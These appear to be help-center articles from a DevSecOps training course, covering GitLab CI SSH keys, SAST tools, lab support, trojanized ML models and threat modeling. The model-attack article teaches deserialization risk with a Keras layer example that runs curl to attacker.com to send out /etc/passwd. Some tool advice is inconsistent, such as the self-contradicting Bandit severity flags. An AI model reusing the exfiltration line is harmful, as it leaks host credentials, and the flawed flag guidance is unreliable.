What Happens Inside a GitLab CI Job? script: - echo $SSH_KEY # ❌ Splits on newlines → corrupted key - echo "$SSH_KEY" > /root/.ssh/id_rsa # ✅ Correct, preserves format Using double quotes ensures the private key is written exactly as it appears in the GitLab CI/CD variable, preventing “Invalid format” and “error in libcrypto” failures. Typical GitLab CI Errors Involving SSH Keys 1. Invalid Format Error Symptom: ERROR: Invalid format Cause: The key stored in the CI/CD variable has been altered—usually by extra spaces, missing line breaks, or HTML‑entity conversion during copy‑paste. Root Sources: - Copy‑pasting from a web page that adds invisible characters. - Saving the key in a text editor that strips trailing newlines. - Not using the “Protected” flag for variables that need to be accessed by protected branches only. 2. Libcrypto Loading Error Symptom: Error loading key "/root/.ssh/id_rsa": error in libcrypto Cause: OpenSSL’s libcrypto cannot parse the PEM data because the file is malformed (often due to missing double quotes or truncated content). Typical Trigger: Running a script that references $SSH_KEY without quoting, leading to a broken file on the runner. Step‑by‑Step Fixes 1. Store the Private Key Correctly 1. Open the key in a plain‑text editor (e.g., VS Code, Notepad++) and verify it starts with -----BEGIN RSA PRIVATE KEY----- and ends with -----END RSA PRIVATE KEY-----. 2. Copy the entire block, including line breaks. 3. In GitLab, go to Settings → CI/CD → Variables → Add Variable: - Key: SSH_KEY - Value: Paste the key exactly as copied. - Mask: ✅ (optional, hides the value in job logs) - Protected: ✅ (if only protected branches need it) - Environment scope: * (or limit as required) 2. Write the Key Inside the Job Using Double Quotes deploy: stage: deploy image: alpine:latest script: # Create .ssh directory with proper permissions - mkdir -p /root/.ssh - chmod 700 /root/.ssh # Write the key – note the double quotes! - echo "$SSH_KEY" > /root/.ssh/id_rsa - chmod 600 /root/.ssh/id_rsa # Verify the key can be read - ssh-keygen -y -f /root/.ssh/id_rsa > /dev/null If the ssh-keygen command succeeds, the key is correctly formatted. Practical Example: Deploying a Service via SSH stages: - build - deploy build_job: stage: build script: - echo "Building Docker image..." - docker build -t myapp:${CI_COMMIT_SHA} . deploy_job: stage: deploy image: ubuntu:20.04 before_script: - apt-get update && apt-get install -y openssh-client script: - mkdir -p /root/.ssh && chmod 700 /root/.ssh - echo "$SSH_KEY" > /root/.ssh/id_rsa && chmod 600 /root/.ssh/id_rsa - ssh -o StrictHostKeyChecking=no user@my.server.com "docker pull myapp:${CI_COMMIT_SHA} && docker run -d myapp:${CI_COMMIT_SHA}" Notice the double‑quoted $SSH_KEY and the explicit permission settings—both are essential to avoid format‑related failures. Tips & Best Practices - Always use double quotes when expanding multi‑line variables in Bash scripts. - Validate the key locally with ssh-keygen -y -f <file> before committing it to GitLab. - Enable “Mask” for secret variables to prevent accidental exposure in job logs. - Keep the key file permissions tight (chmod 600) to satisfy SSH security checks. - Test the pipeline in a protected branch first; this prevents accidental runs on the main branch with malformed keys. - Document the exact copy‑paste steps (e.g., start at line 1, include the final newline) in your internal runbooks. Common Questions | Question | Answer | |----------|--------| | Do I need double quotes for other multi‑line variables? | Yes. Any variable that contains spaces, newlines, or special characters should be quoted to avoid word splitting. | | Why does GitLab show “Invalid format” even though the key works locally? | The CI/CD UI may trim trailing newlines or convert line‑break characters. Re‑copy the key using a plain‑text editor and ensure the variable value ends with a newline. | | Can I store the public key instead of the private one? | For authentication you need the private key on the runner. The public key belongs on the remote server’s authorized_keys. | | What does the “Protected” flag do? | It limits the variable’s availability to pipelines that run on protected branches or tags, adding an extra security layer. | | My job still fails with libcrypto after quoting. What next? | Verify the key file on the runner (cat /root/.ssh/id_rsa) to confirm it matches the original. If it’s truncated, re‑enter the variable value. | By understanding why double quotes are essential, correctly storing your SSH key in GitLab, and following the troubleshooting steps above, you’ll eliminate the most common SSH‑related CI/CD failures and keep your DevSecOps pipelines secure and reliable. Happy coding!

Last updated on Jan 06, 2026

Development Best Practices: Why Simpler Solutions Beat Overly Complex Frameworks

Development Best Practices: Why Simpler Solutions Beat Overly Complex Frameworks In today’s fast‑paced DevSecOps landscape, it’s tempting to reach for the newest, biggest framework that promises “everything.” While powerful libraries can accelerate development, they also introduce hidden costs—longer build times, larger attack surfaces, and steeper learning curves for team members. This article explains why you should avoid overly complex frameworks, how to recognize when a lightweight solution is more appropriate, and practical steps you can take to keep your codebase lean, secure, and maintainable. Table of Contents 1. Understanding the “Big Framework” Pitfall 2. When Simpler Is Better: Real‑World Scenarios 3. Guidelines for Choosing the Right Toolset 4. Practical Steps to Refactor Existing Projects 5. Tips & Common Questions Understanding the “Big Framework” Pitfall What does “avoid big frameworks” really mean? - Focus on the problem, not the tool – Use the smallest library that solves the immediate requirement. - Minimize dependencies – Every additional package adds potential bugs, security vulnerabilities, and maintenance overhead. - Preserve agility – Smaller codebases are easier to understand, test, and modify, which is essential for rapid DevSecOps cycles. Hidden costs of large frameworks | Cost Category | Typical Impact | Example | |---------------|----------------|---------| | Performance | Increased bundle size → slower load times | A single‑page app that loads a 10 MB framework bundle for a feature that could be done with vanilla JavaScript | | Security | Larger attack surface; more third‑party code to audit | Unpatched transitive dependencies in a monolithic UI library | | Team Velocity | Steeper learning curve, onboarding delays | New hires spend weeks learning the conventions of a complex MVC framework | | Maintenance | Frequent breaking changes in major releases | Upgrading from Angular 12 to 13 requires extensive code rewrites | When Simpler Is Better: Real‑World Scenarios 1. Tiny utility scripts Scenario: You need to parse a CSV file and generate a summary report. Complex solution: Import a full‑featured data‑processing framework (e.g., Pandas in Python). Simpler solution: Use Python’s built‑in csv module or a lightweight library like csv‑kit. 2. Static website or documentation site Scenario: Publishing API documentation that rarely changes. Complex solution: Deploy a full React/Next.js application. Simpler solution: Use a static site generator such as MkDocs or Hugo, which produces pre‑rendered HTML with minimal JavaScript. 3. CI/CD pipeline scripting Scenario: A custom step to validate JSON schema before deployment. Complex solution: Install a large Node.js framework with many plugins. Simpler solution: Use a single‑file CLI tool like ajv-cli or a small Bash script with jq. Guidelines for Choosing the Right Toolset 1. Define the core requirement first - Write a concise problem statement (e.g., “Read a JSON file and output a sorted list”). - List non‑functional constraints: performance, security, team expertise. 2. Evaluate alternatives with a decision matrix | Criteria | Weight (1‑5) | Option A (Lightweight) | Option B (Heavy) | |----------|--------------|------------------------|------------------| | Learning curve | 4 | 5 | 2 | | Bundle size | 5 | 5 | 1 | | Community support | 3 | 3 | 5 | | Feature completeness | 2 | 3 | 5 | | Security track record | 4 | 4 | 3 | | Total Score | – | (calc) | (calc) | Select the option with the highest weighted score. 3. Adopt “Progressive Enhancement” - Start with a minimal implementation. - Add libraries only when a clear, documented need arises (e.g., a specific performance optimization that cannot be achieved otherwise). 4. Keep dependencies explicit and audited - Pin versions in package.json, requirements.txt, or go.mod. - Use automated tools (Dependabot, Renovate, Snyk) to monitor vulnerabilities. Practical Steps to Refactor Existing Projects 1. Audit your dependency tree # Node.js example npm ls --depth=0 # Python example pipdeptree --freeze 2. Identify “unused” or “over‑engineered” packages – Look for libraries that are imported in only one file or that provide far more functionality than required. 3. Replace with native APIs or micro‑libraries - Replace lodash functions with native ES6 equivalents (Array.prototype.map, Object.entries, etc.). - Swap a full ORM for a lightweight query builder if you only need simple CRUD operations. 4. Write unit tests before refactoring – Guarantees behavior stays consistent. 5. Iteratively remove – Remove one dependency at a time, run the test suite, and commit the change. 6. Document the decision – Add a brief comment or README entry explaining why the simpler approach was chosen. Tips & Common Questions Tips for Learners - Start small: Build a prototype with vanilla code before reaching for a framework. - Leverage language features: Modern JavaScript, Python, and Go have many built‑in capabilities that previously required external libraries. - Use “sandbox” projects: Experiment with a lightweight stack in a throwaway repo to compare performance and complexity. Common Questions | Question | Answer | |----------|--------| | Is it ever okay to use a large framework? | Yes, when the project scope demands features that would be prohibitively expensive to implement from scratch (e.g., enterprise‑grade routing, state management, or internationalization). | | How do I convince my team to drop an existing heavy framework? | Present a cost‑benefit analysis (maintenance time, security risk, performance metrics) and propose a phased migration plan. | | What if the lightweight solution lacks community support? | Verify the library’s maintenance frequency, open‑issue response time, and security track record before adoption. If risk is high, consider building a small internal wrapper. | | Can I combine a lightweight core with optional plugins? | Absolutely. Many frameworks (e.g., Vue.js, Express) support a core‑plus‑plugins architecture that lets you add features only when needed. | Bottom Line Choosing the right level of abstraction is a cornerstone of DevSecOps excellence. By prioritizing simplicity, you reduce build times, shrink the attack surface, and keep your team moving fast. Evaluate every new library against the problem you’re solving, and remember: the best framework is the one you don’t have to use.

Last updated on Jan 06, 2026

Static Analysis Tools Overview: Bandit, Bundler‑Audit, FindSecBugs & AuditJS

Static Analysis Tools Overview: Bandit, Bundler‑Audit, FindSecBugs & AuditJS Static application security testing (SAST) is a cornerstone of any DevSecOps pipeline. In the Practical DevSecOps training you’ll encounter four widely‑used open‑source scanners: Bandit, Bundler‑Audit, FindSecBugs, and AuditJS. This article explains why some tools require extra prerequisites, how to handle false‑positives, filter results by severity, improve scan commands, and troubleshoot common errors such as exit‑code handling and ignore‑file formatting. 1. Bundler‑Audit – Why Ruby Is Needed on Your Local Machine but Not in GitLab 1.1 Installation methods matter | Method | How it works | When you need Ruby | Typical use case | |--------|--------------|-------------------|------------------| | Docker (GitLab CI) | The tool runs inside a pre‑built container that already contains Ruby, Bundler, and the bundler-audit gem. | No – the container isolates the runtime. | Fast, reproducible CI pipelines; no host‑level dependencies. | | Native (local or self‑hosted CI) | You install the gem directly with gem install bundler-audit. | Yes – the host must have a compatible Ruby interpreter and the gem command. | Quick local testing, custom environments, or when Docker is not an option. | 1.2 Practical tip - CI/CD (GitLab/GitHub): Use the official Docker image ruby:2.7-bundler-audit (or a custom image) and invoke bundler-audit inside the job script. - Local development: Install Ruby (via rbenv, rvm, or your package manager) then run gem install bundler-audit. By leveraging Docker, the pipeline avoids “Ruby not found” errors and guarantees the same version of the scanner across all runs. 2. Bandit – Handling False Positives in the Baseline File 2.1 What is a baseline file? A baseline (.bandit-baseline.json) stores findings from a previous scan. During a new scan, Bandit compares current results against the baseline and flags any new issues. 2.2 Why your changes seem ignored - All baseline entries are still displayed – Bandit shows every issue that exists in the baseline, regardless of whether you edited the source file. - Only one entry needs to be marked as false‑positive – As soon as a single issue in the baseline is flagged with "false_positive": true, the overall scan will display a green tick. 2.3 Step‑by‑step fix 1. Open the baseline snippet: https://gitlab.practical-devsecops.training/-/snippets/15. 2. Locate the issue you want to suppress and set "false_positive": true. 3. Commit the updated baseline file. 4. Re‑run bandit -r . -c .bandit-baseline.json. Now the scan will treat that entry as ignored, and the pipeline will pass. 3. Bandit – Failing a Build Only on High‑Severity Findings Bandit provides a simple flag to limit the exit status to a chosen severity level. # Fail the job only when HIGH or CRITICAL issues are found bandit -r . -lll # -lll = low, low, low → only high & above trigger non‑zero exit | Flag | Meaning | |------|---------| | -l | Show low severity only (does not affect exit code). | | -ll | Show low + medium. | | -lll | Show low + medium + high (default). | | -x | Exclude files or directories. | You can also combine with --exit-zero to always succeed and rely on a separate script to parse the JSON output for high‑severity findings. 4. FindSecBugs – Aligning the Scan with DevSecOps Best Practices 4.1 Current command (example) findsecbugs -output findsecbugs-report.xml -progress -low -medium -high . 4.2 Recommendations for a production‑grade pipeline 1. Limit output to actionable severities – Drop low‑severity findings to reduce noise. findsecbugs -output findsecbugs-report.xml -medium -high . 2. Use a machine‑readable format – XML (or SARIF) integrates easily with CI dashboards, DefectDojo, or GitLab Security Reports. 3. Fail the job on critical findings – Add -failOnHigh (or parse the XML after the scan). 4.3 Sample improved command findsecbugs -output findsecbugs-report.sarif \ -medium -high \ -failOnHigh \ -progress . This command produces a SARIF file that can be uploaded to GitLab/GitHub security dashboards and aborts the pipeline if any high‑severity issue is detected. 5. AuditJS – Ignoring Specific Vulnerabilities AuditJS reads an ignore file (auditjs-ignore.json) that must be valid JSON. A common mistake is using trailing commas or comments, which break the parser. 5.1 Correct ignore‑file structure { "ignore": [ { "module": "lodash", "version": "4.17.15", "reason": "Patched in downstream library" }, { "module": "express", "version": "4.16.0", "reason": "False positive – not used in production" } ] } 5.2 How to use it auditjs scan . --ignore-file auditjs-ignore.json If you still see errors, run jq . auditjs-ignore.json to validate the JSON syntax. 6. Bandit Exit Codes – Why Piping Changes the Result - Without piping: bandit -r . -f json returns exit code 1 when any issue (of any severity) is found. - With piping: bandit -r . -f json | tee bandit-output.json returns exit code 0 because the pipeline’s final command (tee) succeeds, masking Bandit’s original status. 6.1 Preserve Bandit’s exit code bandit -r . -f json | tee bandit-output.json # Capture Bandit’s status in $PIPESTATUS (bash) if [ ${PIPESTATUS[0]} -ne 0 ]; then echo "Bandit detected vulnerabilities" exit 1 fi Or use set -o pipefail at the start of the script to propagate the first non‑zero status. 7. Quick Reference & Tips | Topic | Command / Tip | |-------|---------------| | Run Bundler‑Audit in CI | docker run --rm -v $(pwd):/app -w /app ruby:2.7 bundler-audit check --update | | Mark Bandit false‑positive | Edit baseline JSON → "false_positive": true | | Fail on high Bandit issues only | bandit -r . -lll | | FindSecBugs high‑severity only | findsecbugs -output report.sarif -medium -high -failOnHigh . | | Validate AuditJS ignore file | jq . auditjs-ignore.json | | Preserve exit code with pipe | set -o pipefail or check ${PIPESTATUS[0]} | Final Thought Integrating these static analysis tools with the right installation method, output handling, and error‑checking logic turns a simple scan into a robust DevSecOps control. By following the patterns above, you’ll keep pipelines fast, results reproducible, and security findings actionable. Happy scanning!

Last updated on Jan 06, 2026

Troubleshooting the Automatic Answer Checker & Managing Lab Progress in DevSecOps Courses

Troubleshooting the Automatic Answer Checker & Managing Lab Progress in DevSecOps Courses Learn how to verify your answers, avoid common pitfalls with the Automatic Answer Checker (AAC), and understand the current limits on resetting lab progress. Introduction DevSecOps learners often encounter two recurring technical concerns: the Automatic Answer Checker (AAC) marking a correct response as wrong, and the desire to reset lab progress after a mistake or a change in learning path. This article walks you through why the AAC can be finicky, how to confirm your answer against the expected format, and what options (or limitations) exist for lab‑progress management. By following the practical steps below, you’ll reduce frustration, keep your learning momentum, and know exactly when to reach out to technical support. 1. Why the Automatic Answer Checker May Flag a Correct Answer The AAC is designed to provide instant feedback, but its strict validation rules can sometimes clash with a learner’s interpretation of a “correct” answer. 1.1 Case‑sensitivity - Upper‑case vs. lower‑case: Password123 ≠ password123. - The AAC treats each character exactly as stored in the answer key. 1.2 Whitespace and punctuation - Leading/trailing spaces ( "admin" vs. "admin"). - Extra line breaks or missing commas in list‑type answers. 1.3 Expected format or token - Some challenges require a specific token (e.g., a UUID, hash, or secret key). - Even if the token works in the lab, the AAC will only accept the exact string it expects. 1.4 Context vs. exact match - The AAC does not evaluate the functionality of your answer; it checks for an exact string match. - A logically correct command that uses a different flag order may be rejected. 2. How to Verify Your Answer with the AAC Before assuming the AAC is wrong, use the built‑in Answer button to compare your submission. 1. Click the “Answer” button next to the challenge. 2. The platform will display the reference answer(s). 3. Compare your entry line‑by‑line, paying attention to: - Capitalization - Spaces and line breaks - Exact punctuation (quotes, commas, brackets) Example | Your submission | Reference answer | Issue | |----------------|------------------|-------| | docker run -d nginx | docker run -d nginx:latest | Missing tag (:latest) | | admin | admin | Trailing space in reference answer | If the differences are only cosmetic (e.g., extra spaces), edit your answer to match the reference format exactly and resubmit. 3. Lab Progress Management 3.1 Can you reset lab progress? Current policy: There is no built‑in mechanism to reset a lab’s progress once you’ve started. This limitation helps preserve the integrity of the learning path and the automated grading logic. 3.2 Work‑arounds and best practices - Start a new lab instance (if the platform offers a “Restart Lab” button). - Create a fresh workspace in the lab environment (e.g., a new Docker container or VM snapshot). - Document your steps in a personal notebook so you can revert manually if needed. 3.3 When to contact support If you encounter a lab‑environment failure (e.g., corrupted container, missing resources) that prevents you from completing the lab, open a ticket. Support can: - Provision a new lab instance for you. - Provide a temporary “reset” link for the specific lab (rare, but possible for critical bugs). 4. Common Questions | Question | Answer | |----------|--------| | Why does the AAC reject my answer even though the command works? | The AAC validates the exact string, not execution results. Match the reference format precisely. | | Can I ignore case sensitivity? | No. The AAC is case‑sensitive by design. Use the exact capitalization shown in the reference answer. | | Is there any way to “undo” a lab step? | Not directly. You can manually revert changes in the lab environment (e.g., delete a created file) or restart the lab if the UI permits. | | What information should I include when request to real agent | Lab name, challenge title, your submitted answer, screenshot of the reference answer, and any steps you’ve already tried. | | Will resetting a lab affect my certification eligibility? | Since resetting isn’t currently supported, there’s no impact on certification. If a reset is granted by support, it will be logged but won’t affect your eligibility. | 5. Tips for Success - Copy, don’t type: When possible, copy the reference answer and edit only the variable part. This eliminates hidden characters. - Use a plain‑text editor (e.g., Notepad, VS Code) to strip invisible formatting before pasting into the answer field. - Keep a cheat‑sheet of common AAC quirks (case, whitespace, token format) for quick reference. - Test locally: Run the command or script in your own terminal first; then adapt the exact output to the AAC format. - Bookmark the “Answer” button location on each challenge page so you can quickly verify without scrolling. Conclusion Understanding the strict validation rules of the Automatic Answer Checker and the current inability to reset lab progress empowers you to troubleshoot efficiently and keep your DevSecOps learning journey on track. By following the verification steps, adhering to exact formatting, and leveraging the work‑arounds outlined above, you’ll minimize unnecessary roadblocks and focus on mastering the core security concepts. If you still encounter issues after applying these guidelines, don’t hesitate to reach out to the Technical Support team with detailed information—our goal is to help you succeed.

Last updated on Feb 09, 2026

Advanced Lab Topics: Model Attacks & How to Identify Front‑End vs. Back‑End Code in a Repository

Advanced Lab Topics: Model Attacks & How to Identify Front‑End vs. Back‑End Code in a Repository In this article we dive deep into two frequent pain points that learners encounter while working through DevSecOps labs: 1. Understanding why a trojan‑injected neural‑network model looks different from a classic pickle‑based model 2. Determining whether a given source‑code repository contains front‑end, back‑end, or full‑stack components Both topics are essential for mastering secure model deployment and for communicating effectively with DevOps teams. Let’s explore the concepts, practical steps, and common questions you’ll face on the job. 1. Trojanized Models – What Really Changes? 1.1 The Core Attack Vector Remains the Same Regardless of the model’s format, the underlying vulnerability is pickle‑based code execution. An attacker can embed malicious Python objects that execute arbitrary commands when the model is unpickled (or otherwise deserialized). | Aspect | Classic Pickle Model | Neural‑Network (.h5) Model | |--------|----------------------|----------------------------| | File type | .pkl (binary pickle) | .h5 (HDF5 container) | | Framework | Pure Python / scikit‑learn | TensorFlow / Keras | | Storage format | Serialized Python objects | HDF5 dataset with layers, weights, and optional custom objects | | Attack technique | Inject malicious __reduce__ payload into pickle | Embed malicious custom layer or callback that is executed during model loading (load_model) | | Security risk | Same – arbitrary code execution on deserialization | Same – code runs when the model is loaded with tf.keras.models.load_model() | Bottom line: The type of model (pickle vs. neural network) changes only the file format and loading API. The risk—code execution during deserialization—remains identical. 1.2 Why the .h5 Example Matters In production environments, many teams store Keras/TensorFlow models as .h5 files because HDF5 is compact, version‑agnostic, and easy to serve with model‑hosting platforms. Demonstrating the attack on a .h5 model shows learners how the same exploit can slip through a “real‑world” pipeline that looks perfectly legitimate. Practical Example # Malicious custom layer that runs a shell command class EvilLayer(tf.keras.layers.Layer): def __init__(self, **kwargs): super().__init__(**kwargs) def call(self, inputs): import os os.system('curl http://attacker.com/steal?data=$(cat /etc/passwd)') return inputs # Save the compromised model model = tf.keras.Sequential([tf.keras.layers.Dense(10), EvilLayer()]) model.save('compromised_model.h5') When a downstream service runs tf.keras.models.load_model('compromised_model.h5'), the EvilLayer constructor executes, delivering the same impact as a malicious pickle. 2. Determining Front‑End vs. Back‑End Code in a Repository 2.1 Start with Language‑Based Heuristics | Language / Framework | Typical Layer | Typical File Extensions | |----------------------|---------------|--------------------------| | Python, Java, Go, .NET, Ruby on Rails | Back‑end (API, services, DB logic) | .py, .java, .go, .cs, .rb | | JavaScript (TypeScript, CoffeeScript) | Front‑end UI code | .js, .ts, .coffee | | Angular, Vue.js, React | Front‑end SPA frameworks | .html, .vue, .jsx, .tsx | | Node.js | Can be both (API + server‑side rendering) | .js, .ts | | HTML / CSS / SCSS | Pure front‑end assets | .html, .css, .scss | If you spot a mix of the above, the repository is likely full‑stack. 2.2 Examine Project Structure 1. Look for conventional directories - src/main/java or app/ → back‑end - src/frontend, public/, static/, client/ → front‑end 2. Check build / dependency files - package.json, webpack.config.js, vite.config.ts → front‑end tooling - pom.xml, build.gradle, requirements.txt → back‑end or shared services 3. Identify Dockerfiles / CI scripts - A Dockerfile that installs nginx and copies dist/ usually serves a front‑end bundle. - A Dockerfile that runs gunicorn, java -jar, or dotnet run indicates back‑end services. 2.3 Microservices vs. Monoliths | Architecture | Likely Code Mix | |--------------|-----------------| | Microservices (each repo = one service) | Usually back‑end only (API, DB access) | | Full‑stack application (single repo) | Contains both front‑end UI and back‑end API layers | If you’re dealing with a microservice, ask: “Does this service expose HTTP endpoints only, or does it also bundle a UI?” The answer often lies in the presence of static asset folders (/static, /public) or a frontend/ sub‑module. 2.4 Collaboration Is Key Even with the best heuristics, you may need to: - Ask the repository owner for a quick overview. - Review the README – many teams document the stack explicitly. - Pair‑program with a teammate to walk through the folder layout. 3. Tips & Best Practices - Automate detection: Write a simple script that scans for language‑specific file extensions and reports a front‑end/back‑end ratio. - Use static analysis tools (e.g., cloc, sonarqube) to get a language breakdown. - Validate model sources: Never load a model from an untrusted location without sandboxing or integrity checks (hash verification, signed artifacts). - Document your findings: Add a CODEBASE.md file describing the layers present; this helps future security reviews. 4. Common Questions | Question | Answer | |----------|--------| | Is the neural‑network attack more dangerous than the pickle attack? | No. Both allow arbitrary code execution; the difference is only the file format and loading library. | | What if a repository contains only JavaScript files? | It could be a front‑end SPA, a Node.js back‑end, or a full‑stack project. Look at the package.json scripts (start, build) and any server‑side frameworks (Express, NestJS). | | Can I rely on file extensions alone? | Not entirely. Some projects use compiled assets (.js generated from TypeScript) or embed back‑end code in unconventional files. Combine extension checks with directory conventions and build configs. | | How do I safely load a potentially compromised model? | Use a restricted execution environment (Docker container with limited privileges), verify a digital signature, or load the model in a sandboxed interpreter that disables os.system‑like calls. | Takeaway Understanding the underlying security principle (code execution on deserialization) lets you spot model‑related threats regardless of file type. Simultaneously, mastering language‑based heuristics and project‑structure clues equips you to quickly identify the front‑end/back‑end composition of any repository—an essential skill when collaborating with DevOps and development teams. Use the guidelines above to audit labs confidently, communicate findings clearly, and keep your pipelines secure.

Last updated on Jan 07, 2026

Security Modeling and Compliance as Code: Tools, Scope, and Metadata

Security Modeling and Compliance as Code: Tools, Scope, and Metadata Introduction In today’s fast‑moving DevSecOps landscape, threat modeling and Compliance as Code are essential practices that help teams anticipate risks, meet regulatory obligations, and embed security directly into the software delivery pipeline. This article compares two popular open‑source threat‑modeling tools—Threagile and OWASP PyTM—explores how threat modeling applies far beyond software, and explains how compliance policies are expressed as code with rich metadata. By the end of the guide you’ll know which tool fits your team, how to broaden threat‑modeling to any system, and where to find ready‑made compliance profiles. 1. Choosing a Threat‑Modeling Tool: Threagile vs. OWASP PyTM Both tools are free, community‑driven, and support the same core goal: turn abstract threats into concrete, actionable items. Their differences lie in user experience, automation, and collaboration features. 1.1 OWASP PyTM – Code‑Centric & Automation Friendly | Feature | Details | |---------|---------| | Approach | Write threat‑model definitions in Python scripts. | | Best for | Teams that treat threat modeling like any other source‑code artifact—versioned, linted, and CI‑integrated. | | Automation | Generates STRIDE‑based threat tables automatically; can be invoked from pipelines to keep models up‑to‑date. | | Extensibility | Leverages the full Python ecosystem (e.g., Jinja templates, custom analysis functions). | | Learning curve | Requires basic programming knowledge; ideal for developers and security engineers comfortable with code. | | Key resources | OWASP PyTM documentation | Practical example – CI integration: Add a step in your GitHub Actions workflow that runs pytm on every pull request, fails the build if new high‑severity threats appear, and posts a markdown report as a PR comment. 1.2 Threagile – Visual, Rule‑Based, and Team‑Oriented | Feature | Details | |---------|---------| | Approach | Define models in a YAML file; a web UI renders diagrams and lets non‑technical stakeholders explore them. | | Best for | Mixed teams (developers, product owners, auditors) who need a server‑based repository and visual collaboration. | | Mitigation suggestions | Built‑in rule engine proposes countermeasures based on the identified threats. | | Access control | Role‑based permissions for editing, reviewing, and exporting models. | | Learning curve | Low‑code; no programming required, just a structured YAML file and optional UI. | | Key resources | Threagile GitHub repository | Practical example – Stakeholder review: Upload a YAML model to the Threagile server, generate a live diagram, and share a read‑only link with compliance auditors who can comment directly on the diagram without touching code. 1.3 Decision Checklist | Question | Choose PyTM if… | Choose Threagile if… | |----------|----------------|----------------------| | Do you already manage security artifacts as code? | ✅ | ❌ | | Is your team comfortable writing Python? | ✅ | ❌ | | Do you need a visual UI for non‑programmers? | ❌ | ✅ | | Must you run threat modeling inside CI/CD pipelines? | ✅ | ✅ (via CLI) | | Do you want automated mitigation recommendations? | ❌ | ✅ | | Do you need role‑based access and server‑side storage? | ❌ | ✅ | 2. Threat Modeling: Not Just for Software 2.1 The universal nature of threat modeling Threat modeling is a systematic way to identify, prioritize, and mitigate risks. While it originated in software security, the methodology is equally valuable for any asset that can be attacked or misused. | Domain | Example Threats | Typical STRIDE mapping | |--------|----------------|------------------------| | Physical infrastructure (e.g., a data center) | Unauthorized entry, sabotage, environmental damage | Spoofing (badge forgery), Tampering (hardware tampering), Denial of Service (power cut) | | Automotive (connected car) | Remote code execution, GPS spoofing | Elevation of Privilege, Spoofing | | Smart home (IoT hub) | Credential theft, firmware downgrade | Repudiation, Information Disclosure | | Election systems (voting machines) | Vote manipulation, audit trail deletion | Tampering, Repudiation | | Business processes (procurement workflow) | Fraudulent approvals, data leakage | Spoofing, Information Disclosure | 2.2 Adapting STRIDE to non‑software contexts 1. Identify assets – physical devices, data stores, people, or processes. 2. Define entry points – doors, APIs, network ports, or procedural hand‑offs. 3. Apply STRIDE – ask the same six questions, but translate them into the domain language (e.g., “Can an attacker spoof a badge?”). 4. Prioritize – use impact and likelihood scores, just like in software. 5. Mitigate – assign controls (locks, encryption, policies) and track them in the same model. Scenario: A hospital wants to protect its radiology imaging system. By applying STRIDE, the team discovers a Tampering risk where an insider could replace image files. The mitigation is a combination of digital signatures (software) and tamper‑evident seals (physical). 3. Compliance as Code: Embedding Requirements with Metadata 3.1 What is “Compliance as Code”? Compliance as Code treats regulatory controls (PCI‑DSS, HIPAA, GDPR, etc.) as executable, version‑controlled artifacts. The code contains: - Metadata – unique identifiers, control descriptions, severity, and mapping to standards. - Tests – InSpec, OPA, or custom scripts that validate the environment against the control. - Remediation guidance – Inline comments or links to documentation. 3.2 Why metadata matters Metadata makes compliance discoverable, searchable, and automatable: | Metadata field | Purpose | |----------------|---------| | control_id | Unique reference (e.g., PCI-DSS-6.4) | | description | Human‑readable statement of the requirement | | severity | Risk rating (low/medium/high) | | framework | Source standard (PCI, NIST, ISO) | | tags | Contextual labels (cloud, network, data‑at‑rest) | | remediation | Suggested fix or reference link | When a compliance scanner runs, it can filter by severity to focus on high‑risk controls, or group controls by tags to generate a cloud‑specific report. 3.3 Example: PCI‑DSS control as InSpec code # controls/pci_dss_6_4.rb control 'PCI-DSS-6.4' do title 'Secure development processes' desc 'All changes to system components must be tracked and reviewed.' impact 0.7 tag severity: 'high' tag framework: 'PCI-DSS' tag cloud: true describe file('/etc/gitconfig') do its('content') { should match /commit.gpgsign = true/ } end end The tag statements are the metadata that make the control searchable and sortable. 3.4 Ready‑made compliance profiles Google Cloud provides a curated PCI‑DSS profile built with InSpec: - GitHub: https://github.com/GoogleCloudPlatform/inspec-gcp-pci-profile You can fork the repository, add organization‑specific tags, and run it automatically in your CI pipeline to enforce compliance continuously. 4. Tips & Best Practices | Area | Recommendation | |------|----------------| | Tool selection | Start with a small pilot model in both PyTM and Threagile; compare developer velocity vs. stakeholder engagement. | | Model granularity | Keep the model at a manageable scope (e.g., per microservice or per critical asset) to avoid analysis paralysis. | | Collaboration | Use version control for YAML/Python files; enable pull‑request reviews to involve security, product, and compliance teams. | | Automation | Schedule nightly runs of compliance scans; fail builds on new high‑severity threats or compliance violations. | | Documentation | Store mitigation rationale alongside the threat or control metadata to preserve institutional knowledge. | | Continuous improvement | Review and prune outdated controls every quarter; incorporate lessons learned from incidents. | 5. Common Questions Q1: Can I use both Threagile and PyTM together? Yes. Many organizations maintain a code‑first model in PyTM for CI/CD integration while mirroring the same data in Threagile for visual stakeholder reviews. Export scripts can convert PyTM output to Threagile’s YAML format. Q2: Is threat modeling worth the effort for a small internal tool? Even a lightweight model helps uncover hidden risks early. A simple STRIDE worksheet can be completed in an hour and often reveals misconfigurations that would otherwise be missed. Q3: How do I keep compliance metadata up‑to‑date when standards change? Treat compliance profiles as living code: version them in Git, subscribe to the upstream repository’s releases (e.g., the InSpec PCI profile), and schedule a quarterly sync task to merge upstream changes. Q4: Do I need a separate compliance server? Not necessarily. InSpec can run locally, in CI pipelines, or on a dedicated compliance node. For large enterprises, a centralized compliance dashboard (e.g., Chef Automate, Terraform Cloud) provides aggregated reporting. Conclusion Effective security modeling and Compliance as Code turn abstract requirements into concrete, testable artifacts that evolve with your applications and infrastructure. Choose Threagile for visual, collaborative environments and OWASP PyTM for code‑centric automation. Remember that threat modeling extends to any asset—buildings, vehicles, voting systems—by applying the same STRIDE mindset. Finally, embed compliance controls as code with rich metadata to enable searchable, automated, and continuously auditable security governance. By integrating these practices into your DevSecOps pipeline, you’ll achieve faster risk mitigation, clearer accountability, and smoother audit readiness.

Last updated on Jan 07, 2026

Technical Support: Response Times, Device Configuration, and GitLab Templates for DevSecOps Learners

